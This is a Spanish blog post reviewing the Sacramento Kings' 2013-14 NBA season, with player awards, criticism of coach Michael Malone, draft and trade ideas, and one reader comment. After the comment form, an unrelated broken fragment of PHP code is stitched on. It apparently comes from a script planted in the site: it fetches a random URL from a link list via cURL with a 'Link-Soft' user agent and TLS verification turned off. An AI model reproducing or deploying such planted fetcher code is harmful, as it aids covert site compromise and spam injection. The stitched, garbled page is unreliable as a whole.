Sacramento Kings: Insuficiente

19 de June de 2014 por Sancho88

Nada cambia de un año a otro en estos Kings. Y además, parece importar bastante poco. Su  presencia en los Playoffs quedó descartada prácticamente en el primer mes de competición, y ya van 8 temporadas consecutivas sin entrar en postemporada. Les pedíamos un mísero 40% de victorias en la regular pero volvieron a repetir el mismo parcial que en 2013: 28-54. Y eso que había motivos para creer en ellos. La evolución del trío Cousins-Thomas-Gay fue lo más notable de la temporada. Los dos primeros dieron un salto cualitativo muy importante en su carrera profesional, y el tercero, Rudy Gay, recordó por momentos al proyecto de jugador franquicia que se barruntó en algún momento en su etapa en los Grizzlies. Pero la dependencia del trío anotador de los Kings fue mucho más allá de lo considerado saludable. Cuando jugaron más de 29 minutos en un partido cada uno, el record se fue a 16-15, pero en cuanto falló una de las piezas, por lesiones, problemas de faltas, agotamiento, actitud, etc. todo el equipo se desmontó como un top manta.

El principio de temporada fue flojo y a principios de diciembre el balance era de solo 4 victorias de los 17 partidos jugados lo que llevó a la directiva a tomar decisiones. Greivis Vásquez no fue el cerebro del equipo que pronosticamos y voló a Canadá junto a John Salmons, Patrick Patterson y Chuck Hayes. Fue un movimiento de piezas con escaso valor en el mercado al tratarse de expirings o tener firmados varios años de contrato ‘basura’. Excepto Vásquez, que no se adaptó al juego de Sacramento, los otros tres estaban en todas las quinielas para salir del equipo. Aquí lo pronosticamos y así se cumplió. A cambio, Rudy Gay llegó acompañado de los anecdóticos Quincy Acy y Aaron Gray. Por fin los Kings tenían un alero en condiciones tras Peja Stojakovic y Ron Artest. Curiosamente, este movimiento benefició más a los Raptors, que no pudieron pasar de primera ronda en Playoffs pero sí cuajaron una gran temporada regular. 

Los Kings alcanzaron una buena química ofensiva con Gay pero volvieron a naufragar en defensa. Mike Malone, considerado por muchos como el cerebro que fraguó los sistemas de los actuales Warriors, no supo inculcar su ética defensiva. Fracasó como lo habían hecho anteriormente Eric Musselman, Reggie Theus, Kenny Natt, Paul Westphal o Keith Smart. Desde Rick Adelman nadie ha conseguido enderezar estos jugadores, algo que parece una tarea difícil a corto plazo. Malone no supo aprovechar a Ben McLemore y a Derrick Williams (que llegó al equipo unos días antes que Gay), siempre eran su 4º y 5º espada, sin importar ninguna otra cosa, y ahí perdió un gran caudal de puntos y compromiso. Murió con el trío Thomas-Gay-Cousins y no buscó nada más. Y en defensa no supo arropar a Cousins, ni lograr que defendiera sin ser eliminado por faltas. Encajó menos puntos que algunos de sus predecesores pero también consiguió que el equipo anotara y taponara menos. Un pequeño gran desastre. Su padre Brendan abandonó el equipo antes de empezar, y el hijo no se ha ganado el puesto. Si sigue ahí será porque D’Alessandro y Ranadivé tienen otras muchas cosas en qué pensar de cara a este verano pero su cabeza rodará antes de diciembre con total seguridad.

El resto del equipo fueron medianías. Jason Thompson demuestra todas las noches su compromiso, es un gran capitán, un pegamento desde el banquillo con alma de líder, pero no un titular para disputar playoffs. Reggie Evans sumó buenos números, pero tampoco resultó ser la pareja de baile de Cousins. Y el rookie de segunda ronda Ray McCallum dio bastantes esperanzas como segundo base del equipo. Pero un año más faltó espíritu de equipo, compromiso en defensa, ganas de ganar. No hay un acicate real, los jugadores no saben qué se espera de ellos, y a pesar de demostrar gran categoría y clase individual, no acaban de congeniar. Los ejemplos a seguir son precisamente Toronto Raptors y los actuales Phoenix Suns. Dos equipos humildes, sin grandes estrellas, que venían de muy abajo y han terminado bastante arriba. Sacramento, con más calidad individual que estos equipos, nunca consigue completar una temporada decente. El año del ‘Here We Stay’, del orgullo de Sacramento por seguir en la NBA, no fue ni mucho menos un buen año. La calificación es un suspenso claro; y un muy deficiente para Michael Malone.

PREMIOS

MVP: Un hombre indiscutible se erige como el jefe de estos Kings. DeMarcus Cousins ha dado el salto cualitativo que se esperaba en su carrera, y con unas medias cercanas al 23-12 pocos dudan de sus enormes capacidades. No fue al All-Star porque en el Oeste estaba muy caro y su equipo era un desastr  pero sus números son para volar hacia algún ‘contender’. Es falso el mito de que no se puede construir un equipo campeón con Cousins como pieza clave. Su calidad es inmensa, imposible de cuantificar. Sus números son feroces. Pero su caudal energético necesita un entrenador contrastado para capacitarlo como líder de un equipo aspirante al anillo. Ese es su techo, el más alto. Pero en estos Kings no entienden lo importante que es trabajar con él, poner un Lionel Hollins en su vida, y crear un equipo a su medida. Los Kings no fracasan por Cousins, se hunden porque están mal planificados. Pero DMC es la solución. Desde Chris Webber no aparecía en Sacramento un fenómeno como él y resulta muy fácil echarle la culpa de todo. Pero siendo objetivos el chico no puede hacer más por estos Kings.

Rookie: Muchos se sienten decepcionados con Ben McLemore pero para él es el premio. Si bien es cierto que sus números no han sido los esperados, sobre todo por sus pobres porcentajes en triples, la verdad es que tiene pinta de gran jugador. Su ética de trabajo es enorme, su esfuerzo defensivo destaca muy por encima del resto en estos Kings. Tiene cosas de Carlos Jiménez, y una madurez impropia de su edad. En su actitud en la cancha se puede ver siempre su generosidad. Es un gran jugador de equipo. Con la salida de Marcus Thornton a los Nets fue ganando peso. En anotación ha decepcionado pero es seguro al 100% que estamos ante un gran jugador de baloncesto. En los sistemas de Malone no existía Ben McLemore. Fue el gran perjudicado del trío Thomas-Gay-Cousins, pero siempre siguió trabajando, ayudando a sus compañeros y manteniendo la tranquilidad. Es una joya. Por su parte, Ray McCallum nos dejó sensaciones contradictorias. Empezó muy bien en las ligas de verano, después tardó mucho en debutar en la NBA. Con la salida de Vásquez empezó a jugar, y parecía un auténtico desastre. Pero fue a raíz de la lesión de Thomas cuando de nuevo volvió a remontar el vuelo. Tuvo actuaciones geniales, incluso firmando partidos de 22 y 27 puntos consecutivamente. Puede jugar de 1 y de 2 indistintamente, aunque su defensa a hombres altos no parece muy impresionante. Pero todo lo demás en él está muy bien. La sensación final con McCallum es buena. Queremos ver a los ‘Mc’ en su año ‘sophomore’. Buenas elecciones en el draft de Pete D’Alessandro.

Sorpresa: Calificar a Isaiah Thomas de sorpresa tampoco es demasiado justo. Ya había demostrado durante dos años tener capacidades como sexto hombre, un poco al estilo Nate Robinson, pero esta temporada se ha desmarcado de esa etiqueta de revulsivo desde el banquillo. Sin un entrenador adecuado ha conseguido promediar un enorme 20-3-6. Estuvo en todas las quinielas para el MIP, pero al igual que Cousins con el All-Star, estar en un equipo como los Kings le perjudicó. Incluso para los muy fans de Sacramento, Thomas nos sorprendió muy positivamente. Sencillamente se ha reinventado como jugador. Ha pasado de ser un jugador sumamente egoísta, preciosista y revolucionado a parecer por momentos un base sobrio, contemporizador, fiable. Pasa mucho más, abusa mucho menos del tiro, y sus números son mucho mejores en todos los aspectos. No hay ninguna duda de que es un gran base titular en la NBA. En Sacramento todo se empequeñece, las actuaciones individuales se ponen en duda si esos jugadores estuvieran en otro equipo, pero jugadores como Thomas los necesita cualquier equipo. Un gran defensor a pesar de su altura, un tirador que se crea sus propios tiros y las mete en momentos complicados, y un buen director cuando le apetece. Eso sí, pierde bastantes balones clave. No por mal manejo de la bola, sino porque simplemente sus manos son pequeñas. Hubo partidos sangrantes como contra Minesotta. Ese día Ricky Rubio le robó hasta la suela de las zapatillas. No obstante, temporadón de Isaiah Thomas, y una grata sorpresa para los escépticos de este chico. Ha cerrado muchas bocas. Incluso la mía.

Decepción: Michael Malone. Un entrenador de pacotilla. El equipo daba para mucho más, incluso en el fiero Oeste. No supo exprimir a esta plantilla, ni supo leer los partidos, ni hacer rotaciones coherentes, ni ajustar sistemas, ni tener ideas imaginativas. Se le queda muy grande ser entrenador principal de una franquicia de la NBA. Ahora quieren poner a Alvin Gentry como asistente de Malone. Debería ser al revés, e incluso Gentry sería una mala elección para el banquillo de los Kings. Ahí comienzan muchos de los problemas de Sacramento.

Mayor esfuerzo en vano: Podríamos apuntar al trío Thomas-Gay-Cousins, muy repetido en este resumen. Pero el premio es para la afición, que lleva 8 años yendo al Arco Arena a tragarse paliza tras paliza de un equipo sumamente individualista. Se merecen otro tipo de baloncesto. Sobre todo porque son una afición muy agradecida, y sin ellos el equipo ya habría volado hacia Seattle hace algunos meses.

JUGANDO A GM

A una semana del draft lo más importante ahora mismo es gestionar el pick 8. Teóricamente Rudy Gay anunciará antes del día 23 si ejerce su ‘player option’ o si renuncia a los 19 millones que puede cobrar el año que viene y sale a la agencia libre en busca de un contrato más largo, algo así como un 56×4, más o menos. La cúpula de los Kings ya se ha reunido con Gay, y la intención del ‘frontoffice’ es ofrecerle una multianual cercana a esos números. Gay ha encajado muy bien en estos Kings, y sería una buena decisión para él y para el equipo vincularse para los próximos años. Es importante la decisión de Gay, porque condicionará enormemente la elección en el pick 8. Sacramento quiere renovar a Gay y vender la ronda buscando un veterano que apoye realmente a Cousins en la pintura. Ese sería mi camino a seguir como General Manager. Thaddeus Young fue el primer nombre que se barajó. Con los ojos cerrados haría esa operación. Incluso podría incluirse a Landry, Outlaw, Jason Terry o Jason Thompson en la operación para cuadrar salarios.

No me gustan otros nombres como Dennis Schroeder, que también suena como jugador a intercambiar. Y si no aparece una buena opción para vender el pick, desde luego que huiría de jugadores como Aaron Gordon o Rodney Hood. A estas alturas de la película los Kings necesitan algo más fiable. Los proyectos de grandes jugadores siempre se van abajo en este equipo. Seguro que Gordon fracasaría como lo ha hecho Derrick Williams. Es culpa de un sistema individualista en el que este tipo de jugadores no pueden brillar y sacar sus mejores cualidades.

Obviamente se habla de Marcus Smart, Noah Vonleh, etc. Pero no creo que salgan tan abajo en la lotería. En este caso, mi elección ideal para Sacramento sería Doug McDermott o Darío Saric. El primero porque es un jugador totalmente hecho, y podría actuar como ‘4’ abierto junto a Cousins. Una máquina de anotación y un ‘combo’ para permutar posiciones con Rudy Gay. Podrían hacerse cosas muy interesantes con Gay-McDermott-Cousins. El segundo porque en Sacramento Peja Stojakovic dejó muchísima huella, y a pesar de que Saric no se parece en prácticamente nada a ‘American Graffitti’, la presencia de una estrella balcánica en el equipo sería un acicate de mucha ilusión. Un chico con tal IQ, que sería también ‘combo’ 3-4, y aportaría defensa junto a Thomas y McLemore, si el entrenador acompañase podría hacer un carrerón en estos Kings. Pero como GM que soy tendría que apostar. Doug McDermott sería mi apuesta en el 8.

Del resto del equipo no tocaría nada en los bases, pues considero que el equipo puede crecer muy bien con la pareja Thomas-McCallum. Eso sí, toca renovar a Thomas y eso va a tener un coste. Por lo menos 30×3 sí que firmará.

En escoltas con un Jason Terry prácticamente retirado ‘de facto’ sería interesante buscar una pareja de baile para McLemore. En las últimas horas cobra mucha fuerza el nombre de Nik Stauskas para los Kings. Sería una elección de D’Alessandro 100%. Yo me inclinaría por un traspaso con los Knicks. Iman Shumpert por Reggie Evans parece bastante equilibrado, a mi juicio. Con Jr. Smith y Tim Hardaway Jr. no puede rendir al máximo en los Knicks, y a los Kings le hace falta un defensor como él que puede cubrir varias posiciones en el ‘backourt’. Reggie Evans, además, sigue un poco los cánones que le gustan a Phil Jackson en sus equipos. Un tipo defensor, trabajador y que pueda arropar a sus estrellas. Se podría intentar el trade.

En aleros Travis Outlaw no es muy fiable como suplemento de Rudy Gay. Intentaría un traspaso con los Blazers a cambio de Dorrell Wright, por ejemplo, o Jason Richardson con los Sixers.

En la pintura hay bastantes opciones. Con Thaddeus o McDermott en el equipo para acompañar a Cousins, Jason Thompson o Carl Landry sobrarían. Sobre todo Carl Landry. Está maldito en los Kings. Nunca ha conseguido rendir en este equipo y sería conveniente buscarle un destino. Landry+Terry a los Knicks por Bargnani también podría ser, en ese traspaso en el que también se incluirían Reggie Evans e Iman Shumpert. Es importante jugar con cuatros abiertos al lado de Cousins. Pienso que es lo ideal.

Así el equipo quedaría:

Bases: Isaiah Thomas, Ray McCallum
Escoltas: Ben McLemore, Iman Shumpert
Aleros: Rudy Gay, Dorrell Wright
Ala-pívots: Doug McDermott, Andrea Bargnani, Derrick Williams
Pívots: DeMarcus Cousins, Jason Thompson

Comenta

Un comentario a esta entrada

  1. Denise dice:
    #1

    Según señalan algunos medios, Sacramento ofrece a Isiah Thomas y su pick 8 por Bledsoe.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>